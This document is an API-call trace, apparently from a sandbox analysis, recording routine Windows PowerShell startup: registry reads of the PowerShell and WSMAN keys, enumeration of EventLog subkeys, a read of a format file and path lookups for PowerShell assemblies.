	[0094.623] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4e8 | out: phkResult=0x16d4e8*=0x338) returned 0x0
	[0094.623] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d46c, lpData=0x0, lpcbData=0x16d468*=0x0 | out: lpType=0x16d46c*=0x1, lpData=0x0, lpcbData=0x16d468*=0x56) returned 0x0
	[0094.623] CoTaskMemAlloc (cb=0x5a) returned 0x2ed880
	[0094.623] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d43c, lpData=0x2ed880, lpcbData=0x16d438*=0x56 | out: lpType=0x16d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d438*=0x56) returned 0x0
	[0094.623] CoTaskMemFree (pv=0x2ed880) 
	[0094.623] RegCloseKey (hKey=0x338) returned 0x0
	[0094.624] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x97c24831, Data2=0xf8eb, Data3=0x4e87, Data4=([0]=0xbe, [1]=0xda, [2]=0x3f, [3]=0x1f, [4]=0x10, [5]=0x73, [6]=0x21, [7]=0xfa))) returned 0x0
	[0094.624] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xada1f1b0, Data2=0x31b7, Data3=0x4a78, Data4=([0]=0x91, [1]=0x41, [2]=0x7c, [3]=0xd1, [4]=0x8d, [5]=0x1c, [6]=0x69, [7]=0xce))) returned 0x0
	[0094.625] SetErrorMode (uMode=0x1) returned 0x1
	[0094.625] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0094.625] SetErrorMode (uMode=0x1) returned 0x1
	[0094.625] GetFileType (hFile=0x338) returned 0x1
	[0094.625] ReadFile (in: hFile=0x338, lpBuffer=0x3ce5fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ce5fe8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.626] ReadFile (in: hFile=0x338, lpBuffer=0x3ce5fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ce5fe8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.626] ReadFile (in: hFile=0x338, lpBuffer=0x3ce5fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ce5fe8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.627] ReadFile (in: hFile=0x338, lpBuffer=0x3ce5fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ce5fe8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.627] ReadFile (in: hFile=0x338, lpBuffer=0x3ce5fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ce5fe8*, lpNumberOfBytesRead=0x16d458*=0xe98, lpOverlapped=0x0) returned 1
	[0094.627] ReadFile (in: hFile=0x338, lpBuffer=0x3ce55e8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ce55e8*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0094.627] ReadFile (in: hFile=0x338, lpBuffer=0x3ce5fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3ce5fe8*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0094.627] SetErrorMode (uMode=0x1) returned 0x1
	[0094.627] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0094.628] SetErrorMode (uMode=0x1) returned 0x1
	[0094.628] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4e8 | out: phkResult=0x16d4e8*=0x338) returned 0x0
	[0094.628] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d46c, lpData=0x0, lpcbData=0x16d468*=0x0 | out: lpType=0x16d46c*=0x1, lpData=0x0, lpcbData=0x16d468*=0x56) returned 0x0
	[0094.628] CoTaskMemAlloc (cb=0x5a) returned 0x2ed880
	[0094.628] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d43c, lpData=0x2ed880, lpcbData=0x16d438*=0x56 | out: lpType=0x16d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d438*=0x56) returned 0x0
	[0094.628] CoTaskMemFree (pv=0x2ed880) 
	[0094.628] RegCloseKey (hKey=0x338) returned 0x0
	[0094.629] VirtualQuery (in: lpAddress=0x16bf80, lpBuffer=0x16ce40, dwLength=0x30 | out: lpBuffer=0x16ce40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.629] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x32f40b8b, Data2=0x4c1e, Data3=0x489d, Data4=([0]=0x83, [1]=0xd8, [2]=0xf0, [3]=0x16, [4]=0x34, [5]=0x9a, [6]=0x45, [7]=0x9a))) returned 0x0
	[0094.629] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x1d2b5303, Data2=0x6f2a, Data3=0x43b6, Data4=([0]=0xb8, [1]=0xe1, [2]=0x16, [3]=0x63, [4]=0xea, [5]=0x98, [6]=0x2e, [7]=0x2b))) returned 0x0
	[0094.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0094.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0094.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0094.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0094.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0094.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0094.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0094.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0094.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0094.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0094.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0094.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0095.098] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0095.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.098] CoTaskMemFree (pv=0x3080c0) 
	[0095.100] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0095.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.100] CoTaskMemFree (pv=0x3080c0) 
	[0095.102] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0095.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.102] CoTaskMemFree (pv=0x3080c0) 
	[0095.104] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0095.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.104] CoTaskMemFree (pv=0x3080c0) 
	[0095.110] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0095.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.110] CoTaskMemFree (pv=0x3080c0) 
	[0095.112] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0095.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.112] CoTaskMemFree (pv=0x3080c0) 
	[0095.113] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0095.113] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.113] CoTaskMemFree (pv=0x3080c0) 
	[0095.170] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6f8 | out: phkResult=0x16d6f8*=0x338) returned 0x0
	[0095.172] RegQueryInfoKeyW (in: hKey=0x338, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d5fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.172] CoTaskMemFree (pv=0x0) 
	[0095.172] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.172] RegEnumValueW (in: hKey=0x338, dwIndex=0x0, lpValueName=0x29eb90, lpcchValueName=0x16d6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0095.172] CoTaskMemFree (pv=0x29eb90) 
	[0095.172] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.172] RegEnumValueW (in: hKey=0x338, dwIndex=0x1, lpValueName=0x29eb90, lpcchValueName=0x16d6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0095.172] CoTaskMemFree (pv=0x29eb90) 
	[0095.172] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.172] RegEnumValueW (in: hKey=0x338, dwIndex=0x2, lpValueName=0x29eb90, lpcchValueName=0x16d6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0095.173] CoTaskMemFree (pv=0x29eb90) 
	[0095.173] RegQueryValueExW (in: hKey=0x338, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d68c, lpData=0x0, lpcbData=0x16d688*=0x0 | out: lpType=0x16d68c*=0x1, lpData=0x0, lpcbData=0x16d688*=0x8) returned 0x0
	[0095.173] CoTaskMemAlloc (cb=0xc) returned 0x30fdd0
	[0095.173] RegQueryValueExW (in: hKey=0x338, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d65c, lpData=0x30fdd0, lpcbData=0x16d658*=0x8 | out: lpType=0x16d65c*=0x1, lpData="2.0", lpcbData=0x16d658*=0x8) returned 0x0
	[0095.173] CoTaskMemFree (pv=0x30fdd0) 
	[0095.351] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x334) returned 0x0
	[0095.351] RegQueryInfoKeyW (in: hKey=0x334, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d54c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d548, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d54c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d548*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.351] CoTaskMemFree (pv=0x0) 
	[0095.351] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.351] RegEnumValueW (in: hKey=0x334, dwIndex=0x0, lpValueName=0x29eb90, lpcchValueName=0x16d5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0095.351] CoTaskMemFree (pv=0x29eb90) 
	[0095.351] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.351] RegEnumValueW (in: hKey=0x334, dwIndex=0x1, lpValueName=0x29eb90, lpcchValueName=0x16d5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0095.352] CoTaskMemFree (pv=0x29eb90) 
	[0095.352] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.352] RegEnumValueW (in: hKey=0x334, dwIndex=0x2, lpValueName=0x29eb90, lpcchValueName=0x16d5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0095.352] CoTaskMemFree (pv=0x29eb90) 
	[0095.352] RegQueryValueExW (in: hKey=0x334, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d5dc, lpData=0x0, lpcbData=0x16d5d8*=0x0 | out: lpType=0x16d5dc*=0x1, lpData=0x0, lpcbData=0x16d5d8*=0x8) returned 0x0
	[0095.352] CoTaskMemAlloc (cb=0xc) returned 0x30fcf0
	[0095.352] RegQueryValueExW (in: hKey=0x334, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d5ac, lpData=0x30fcf0, lpcbData=0x16d5a8*=0x8 | out: lpType=0x16d5ac*=0x1, lpData="2.0", lpcbData=0x16d5a8*=0x8) returned 0x0
	[0095.352] CoTaskMemFree (pv=0x30fcf0) 
	[0095.353] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0095.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.353] CoTaskMemFree (pv=0x3080c0) 
	[0095.359] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0095.359] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.359] CoTaskMemFree (pv=0x3080c0) 
	[0095.366] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d678 | out: phkResult=0x16d678*=0x308) returned 0x0
	[0095.369] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d5ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d5ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.369] CoTaskMemFree (pv=0x0) 
	[0095.370] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.370] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x29eb90, lpcchName=0x16d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.370] CoTaskMemFree (pv=0x29eb90) 
	[0095.370] CoTaskMemFree (pv=0x0) 
	[0095.370] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.370] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x29eb90, lpcchName=0x16d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.370] CoTaskMemFree (pv=0x29eb90) 
	[0095.370] CoTaskMemFree (pv=0x0) 
	[0095.370] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.370] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x29eb90, lpcchName=0x16d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.371] CoTaskMemFree (pv=0x29eb90) 
	[0095.371] CoTaskMemFree (pv=0x0) 
	[0095.371] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.371] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x29eb90, lpcchName=0x16d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.371] CoTaskMemFree (pv=0x29eb90) 
	[0095.371] CoTaskMemFree (pv=0x0) 
	[0095.371] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.371] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x29eb90, lpcchName=0x16d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.371] CoTaskMemFree (pv=0x29eb90) 
	[0095.371] CoTaskMemFree (pv=0x0) 
	[0095.371] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.371] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x29eb90, lpcchName=0x16d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.371] CoTaskMemFree (pv=0x29eb90) 
	[0095.371] CoTaskMemFree (pv=0x0) 
	[0095.371] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.371] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x29eb90, lpcchName=0x16d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.371] CoTaskMemFree (pv=0x29eb90) 
	[0095.371] CoTaskMemFree (pv=0x0) 
	[0095.371] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.371] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x29eb90, lpcchName=0x16d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.371] CoTaskMemFree (pv=0x29eb90) 
	[0095.371] CoTaskMemFree (pv=0x0) 
	[0095.371] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.371] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x29eb90, lpcchName=0x16d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.371] CoTaskMemFree (pv=0x29eb90) 
	[0095.371] CoTaskMemFree (pv=0x0) 
	[0095.372] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x30c) returned 0x0
	[0095.372] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x0) returned 0x2
	[0095.372] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x310) returned 0x0
	[0095.372] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x0) returned 0x2
